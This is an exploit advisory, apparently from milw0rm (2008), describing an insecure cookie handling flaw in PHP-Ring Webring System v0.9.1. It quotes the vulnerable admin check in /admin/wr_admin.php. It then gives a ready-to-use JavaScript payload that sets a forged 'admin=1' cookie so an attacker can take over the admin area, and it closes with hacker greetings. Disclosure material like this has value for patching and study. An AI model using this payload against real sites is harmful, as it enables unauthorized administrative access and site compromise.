# #
# ...:::::PHP-Ring Webring System v0.9.1 Insecure Cookie Handling Vulnerability ::::.... #
Virangar Security Team
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
vuln code in /admin/wr_admin.php
$cookie = $_COOKIE[admin]; //check for cookie
if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") {
echo "Enter admin username and password to log in";
} else {
function adminhome() // load admin settings
javascript:document.cookie = "admin=1; path=/";
now visit /admin and you can get admin access and manage the cms ;)
young iranian h4ck3rz
# milw0rm.com [2008-08-10]